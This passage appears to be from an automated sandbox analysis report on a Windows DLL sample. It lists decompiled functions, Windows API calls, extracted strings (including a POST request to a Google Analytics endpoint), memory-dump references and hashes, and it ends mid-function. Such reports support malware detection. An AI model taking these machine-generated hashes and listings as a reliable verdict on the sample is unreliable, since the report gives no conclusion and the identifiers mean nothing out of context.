                                                                                                                                                    Function 6E655997, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6E6559BD
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6E6559CD
                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000), ref: 6E6559D6
                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,00000000), ref: 6E6559E4
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 6E655A0C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
                                                                                                                                                    • String ID: SetDefaultDllDirectories$\$kernel32.dll
                                                                                                                                                    • API String ID: 2101061299-3881611067
                                                                                                                                                    • Opcode ID: f744dcd4bfecd5986cbf617b1c18a7de7afe428042739c0e8a0f90996dc32e3f
                                                                                                                                                    • Instruction ID: 6cbaca5a9ac3475dec1e5ceed8ed7df1a02de43aaa695f7864a721f66b9c09a7
                                                                                                                                                    • Opcode Fuzzy Hash: f744dcd4bfecd5986cbf617b1c18a7de7afe428042739c0e8a0f90996dc32e3f
                                                                                                                                                    • Instruction Fuzzy Hash: AF21C331B80219BBDF10DAE68C9CBDF3BACAB06754F040866A815E3300EB74D65486A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6551A9, Relevance: 14.0, APIs: 9, Instructions: 474COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b8157f67d26b056be701b4a059dda89bc01005849d85e10f0a045751849e2ccb
                                                                                                                                                    • Instruction ID: 45e932be7467c25b93a056c6e78b2658c42ccd5e0b640148b89d3b74a879d14f
                                                                                                                                                    • Opcode Fuzzy Hash: b8157f67d26b056be701b4a059dda89bc01005849d85e10f0a045751849e2ccb
                                                                                                                                                    • Instruction Fuzzy Hash: 7B02AD31A10A15EFCB01DFE9C88899EBBB6FF4A310B108459E911AB311D731EC91CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6561D1, Relevance: 13.6, APIs: 9, Instructions: 121windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6E6561DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,00000000,00000080), ref: 6E656222
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 6E65624E
                                                                                                                                                    • ValidateRect.USER32(00000000,00000000), ref: 6E656261
                                                                                                                                                      • Part of subcall function 6E65E627: GetClientRect.USER32 ref: 6E65E691
                                                                                                                                                    • GetClientRect.USER32 ref: 6E6562D9
                                                                                                                                                    • BeginPaint.USER32(00000000,?), ref: 6E6562E6
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,00000000,?), ref: 6E65631C
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,00000000), ref: 6E65633E
                                                                                                                                                    • EndPaint.USER32(00000000,?), ref: 6E656356
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Rect$ClientPaint$BeginH_prolog3_Validate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3883544035-0
                                                                                                                                                    • Opcode ID: 325c893f27d583b570f2e2934ffaf5de58fc812c302af362e787cf46b4d9dc48
                                                                                                                                                    • Instruction ID: c1e8e7f5759f46ce1b382e12eb53921aa5304b622247631ceed765fd44105107
                                                                                                                                                    • Opcode Fuzzy Hash: 325c893f27d583b570f2e2934ffaf5de58fc812c302af362e787cf46b4d9dc48
                                                                                                                                                    • Instruction Fuzzy Hash: 7C418F71A10A09EFDF119FE1C894AAEBBB9FF59304F10482DE056A2360DB359920CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E673D36, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 320COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                    • String ID: {xfn${xfn${xfn
                                                                                                                                                    • API String ID: 3213747228-2341166829
                                                                                                                                                    • Opcode ID: 2bffd83b93b42123345f3970eab2e24b2b748240668ca800f5cac74d8137e5be
                                                                                                                                                    • Instruction ID: 5306ed6d07e1971ce2a369a28d560a0f391d2db5683d02af2152ee83b1affaa5
                                                                                                                                                    • Opcode Fuzzy Hash: 2bffd83b93b42123345f3970eab2e24b2b748240668ca800f5cac74d8137e5be
                                                                                                                                                    • Instruction Fuzzy Hash: 02B16A329552869FEF21CFA8C854BEEBBF5EF56384F10456AE8549B341D3388D02CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E656D5E, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 219libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6E656D81
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetGestureInfo), ref: 6E656DB6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseGestureInfoHandle), ref: 6E656DDE
                                                                                                                                                    • ScreenToClient.USER32 ref: 6E656E6A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$ClientHandleModuleScreen
                                                                                                                                                    • String ID: CloseGestureInfoHandle$GetGestureInfo$user32.dll
                                                                                                                                                    • API String ID: 471820996-2905070798
                                                                                                                                                    • Opcode ID: 98edc9334b35486d86670dd087e354a1b7fbfa95844d6d0e64bc74f588fde4b1
                                                                                                                                                    • Instruction ID: 9fdaed64627313948ce5369eb8bf9036779efa54d762247b2d617990bd6cc736
                                                                                                                                                    • Opcode Fuzzy Hash: 98edc9334b35486d86670dd087e354a1b7fbfa95844d6d0e64bc74f588fde4b1
                                                                                                                                                    • Instruction Fuzzy Hash: B581BF74B60A16EFCB04CFA9CA94A9EBBF5FB0A314B001169E811D7350D735E921CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62A490, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 157memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E625BB0: _DebugHeapAllocator.LIBCPMTD ref: 6E625BE7
                                                                                                                                                      • Part of subcall function 6E625C30: _DebugHeapAllocator.LIBCPMTD ref: 6E625C67
                                                                                                                                                    • _fwprintf.LIBCONCRTD ref: 6E62A588
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62A5E6
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62A60E
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62A644
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork_fwprintf
                                                                                                                                                    • String ID: %02X$%d.%d.%d.%d$%s-%s-%s
                                                                                                                                                    • API String ID: 500518543-2720032964
                                                                                                                                                    • Opcode ID: 93e8b707cfd155f67afdd572dd9e6831c22bcaf99408e890180e164efb606c4e
                                                                                                                                                    • Instruction ID: 125a31ecdde1cfe3b0f6a82098263509060fa8ee1ff94288be61b9efc5e857ef
                                                                                                                                                    • Opcode Fuzzy Hash: 93e8b707cfd155f67afdd572dd9e6831c22bcaf99408e890180e164efb606c4e
                                                                                                                                                    • Instruction Fuzzy Hash: FE610871810149EFDB04DFE4D990FEEB7B8BF14318F544929E411A7291DB746A08CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65E1C3, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CheckMenuItem.USER32(?,?,00000000), ref: 6E65E1F2
                                                                                                                                                      • Part of subcall function 6E65DA86: GetWindowTextW.USER32 ref: 6E65DADC
                                                                                                                                                      • Part of subcall function 6E65DA86: lstrcmpW.KERNEL32(?,?), ref: 6E65DAEE
                                                                                                                                                      • Part of subcall function 6E65DA86: SetWindowTextW.USER32(?,?), ref: 6E65DAFA
                                                                                                                                                    • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 6E65E20D
                                                                                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 6E65E22A
                                                                                                                                                    • SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00000000), ref: 6E65E297
                                                                                                                                                    • SetMenuItemInfoW.USER32 ref: 6E65E2E7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
                                                                                                                                                    • String ID: 0$@
                                                                                                                                                    • API String ID: 72408025-1545510068
                                                                                                                                                    • Opcode ID: c915e63a20d98b6ed2f7aa839563313a2c88453326a0b711fcce261c13d4a21f
                                                                                                                                                    • Instruction ID: 3b4d80274dc758c95970523390a3df144ef111ef76167107209388d9d0a538d9
                                                                                                                                                    • Opcode Fuzzy Hash: c915e63a20d98b6ed2f7aa839563313a2c88453326a0b711fcce261c13d4a21f
                                                                                                                                                    • Instruction Fuzzy Hash: 5141DD71340206EFEF108FA5C844F9ABBBAFF06700F108A29F5099B650D770E861CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E635FD0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _swprintf.LIBCMTD ref: 6E636033
                                                                                                                                                      • Part of subcall function 6E636510: __vswprintf_s_l.LIBCONCRTD ref: 6E63652E
                                                                                                                                                    • getaddrinfo.WS2_32(?,?,?,?), ref: 6E63604B
                                                                                                                                                    • socket.WS2_32(?,?,?), ref: 6E63608B
                                                                                                                                                    • connect.WS2_32(000000FF,?,?), ref: 6E6360B8
                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 6E6360D2
                                                                                                                                                    • freeaddrinfo.WS2_32(?), ref: 6E6360E5
                                                                                                                                                      • Part of subcall function 6E66F550: IsProcessorFeaturePresent.KERNEL32(00000017,6E673788,?,?,6E66F469,?,?,?,?,6E62CB2E,00000000,00000000,?,?,00000000), ref: 6E66F56C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FeaturePresentProcessor__vswprintf_s_l_swprintfclosesocketconnectfreeaddrinfogetaddrinfosocket
                                                                                                                                                    • String ID: 2_cn
                                                                                                                                                    • API String ID: 3109923487-4166840960
                                                                                                                                                    • Opcode ID: 4739f592f798aab134b3ef1e8b43c8ff37aa676aed0106001890e2f734fbcdc3
                                                                                                                                                    • Instruction ID: 66d28dc401e5c2dfca4aba637279ee78873a32a97c59460255d79b666d900e8a
                                                                                                                                                    • Opcode Fuzzy Hash: 4739f592f798aab134b3ef1e8b43c8ff37aa676aed0106001890e2f734fbcdc3
                                                                                                                                                    • Instruction Fuzzy Hash: 054144B0D20209DFCB04CFE9C585AEEBBB5BF49314F20861AE529A7381D7349941CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E635E70, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 6E635EC7
                                                                                                                                                    • send.WS2_32(000000FF,00000000,?,00000000), ref: 6E635F60
                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 6E635F6E
                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 6E635F81
                                                                                                                                                    • WSACleanup.WS2_32 ref: 6E635F91
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    • POST /collect HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.google-analytics.comContent-Length: %d%s, xrefs: 6E635F01
                                                                                                                                                    • www.google-analytics.com, xrefs: 6E635F28
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Base::CleanupConcurrency::details::ContextErrorIdentityLastQueueStartupWorkclosesocketsend
                                                                                                                                                    • String ID: POST /collect HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: www.google-analytics.comContent-Length: %d%s$www.google-analytics.com
                                                                                                                                                    • API String ID: 946640716-1480477549
                                                                                                                                                    • Opcode ID: 4485428043ede8de8dcaf62ebe0a88737e3df278a3889c434d168e5fcad96fef
                                                                                                                                                    • Instruction ID: 5f1a0d5998f118a155c7597ec917e75894454d0ec1632193672fe703cf3c3697
                                                                                                                                                    • Opcode Fuzzy Hash: 4485428043ede8de8dcaf62ebe0a88737e3df278a3889c434d168e5fcad96fef
                                                                                                                                                    • Instruction Fuzzy Hash: 60317070A01218EFEB10DFA0DD44BEEB778EF06314F504699E469AB2C1DB745A44CF92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E633E60, Relevance: 12.3, APIs: 8, Instructions: 274COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: allocator
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3447690668-0
                                                                                                                                                    • Opcode ID: c84d093dc6b40ada9f1773df3543e0895bd94c561b16ee5232f534ef157f9352
                                                                                                                                                    • Instruction ID: 419a8260e3ecdddd492deec6617902a60c456817c021bfe9238d5b33d06a53d7
                                                                                                                                                    • Opcode Fuzzy Hash: c84d093dc6b40ada9f1773df3543e0895bd94c561b16ee5232f534ef157f9352
                                                                                                                                                    • Instruction Fuzzy Hash: 80A13BB5E00129EFCB04DFD8E9908EEB7BABF45304F709559E425A7245DB31AE05CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E636640, Relevance: 12.1, APIs: 8, Instructions: 115COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,00000004,?,?,?,?,?,?,6E64CB64), ref: 6E63665B
                                                                                                                                                    • ShowWindow.USER32(?,00000004,?,?,?,?,?,?,6E64CB64), ref: 6E63666A
                                                                                                                                                    • ShowWindow.USER32(?,00000004,?,?,?,?,?,?,6E64CB64), ref: 6E636679
                                                                                                                                                    • ShowWindow.USER32(?,00000004,?,?,?,?,?,?,6E64CB64), ref: 6E636688
                                                                                                                                                      • Part of subcall function 6E636810: CopyRect.USER32 ref: 6E63681F
                                                                                                                                                      • Part of subcall function 6E64F380: MulDiv.KERNEL32(00000003,00000060,00000060), ref: 6E64F38F
                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000010,?,?,?,?,?), ref: 6E6366E1
                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000010,?,?,?,?,?,?,6E64CB64), ref: 6E63670D
                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,?,?,?,00000000,00000010,?,?,?,?,?,?,6E64CB64), ref: 6E636733
                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,?,?,?,00000000,00000010,?,?,?,?,?,?,6E64CB64), ref: 6E63675C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Show$CopyRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 256051259-0
                                                                                                                                                    • Opcode ID: fa919ea5c50e798649407d6d551fcda845f3e5b566f49b7e24653295b3ded18f
                                                                                                                                                    • Instruction ID: dafb66e04101ef15709f3cae588ea3025a80cfae78c083bf82ff17674ccab0e2
                                                                                                                                                    • Opcode Fuzzy Hash: fa919ea5c50e798649407d6d551fcda845f3e5b566f49b7e24653295b3ded18f
                                                                                                                                                    • Instruction Fuzzy Hash: 6541EFB5A1010AAFDB04DFD8C996EFFB779AF49711F108608F616A72D0CB30A941CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65AB77, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6E65AB7E
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000010,6E65AAA5,?,00000000), ref: 6E65AB8F
                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,00000000), ref: 6E65ABAB
                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000000,00000010,?,?,00000000), ref: 6E65AC13
                                                                                                                                                    • LocalReAlloc.KERNEL32(?,00000000,00000002,00000010,?,?,00000000), ref: 6E65AC2D
                                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 6E65AC5E
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 6E65AC7C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocCriticalLocalSectionValue$EnterH_prolog3_catchLeave
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1707010094-0
                                                                                                                                                    • Opcode ID: f8f3c1cd9e841bc215be0d3bc0acde84c9f72dca2e5ddaaae02564537bba73cb
                                                                                                                                                    • Instruction ID: 4c1116196ffe771646eea85ecf41d09d5f9f0baa046c5b4e83c164960175ac63
                                                                                                                                                    • Opcode Fuzzy Hash: f8f3c1cd9e841bc215be0d3bc0acde84c9f72dca2e5ddaaae02564537bba73cb
                                                                                                                                                    • Instruction Fuzzy Hash: 2731B270640B02EFCB258F99C899A9B7BB6FF41320B10855DE8559B354D771E850CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65DB17, Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RealChildWindowFromPoint.USER32(?,?,?), ref: 6E65DB3B
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6E65DB56
                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 6E65DB5F
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 6E65DB6F
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 6E65DB7F
                                                                                                                                                    • GetWindowRect.USER32 ref: 6E65DB9D
                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 6E65DBAD
                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 6E65DBBC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$ChildClientCtrlFromLongPointRealScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 151369081-0
                                                                                                                                                    • Opcode ID: 7433917aafb1edd9ff0dd118d29ea6d74637034a053e224e5824a721992baa3d
                                                                                                                                                    • Instruction ID: 16fd502b39fe44f0e383b457c621ecaf40668761b99dea10a9b3280df1131b89
                                                                                                                                                    • Opcode Fuzzy Hash: 7433917aafb1edd9ff0dd118d29ea6d74637034a053e224e5824a721992baa3d
                                                                                                                                                    • Instruction Fuzzy Hash: EB218375A41A1AABDF019FE9CC48DAFBBBDEF07711B104129E411E3380DB34DA018BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403DF6, Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00403DF6(void* __eax, struct HDC__* _a4, struct HWND__* _a8) {
				struct tagLOGBRUSH _v16;
				void* _t32;
				long _t34;
				long _t36;
				void* _t38;
				long* _t49;

				if(__eax + 0xfffffecd > 5) {
					L15:
					_t32 = 0;
				} else {
					_t49 = GetWindowLongW(_a8, 0xffffffeb);
					if(_t49 == 0) {
						goto L15;
					} else {
						_t34 =  *_t49;
						if((_t49[5] & 0x00000002) != 0) {
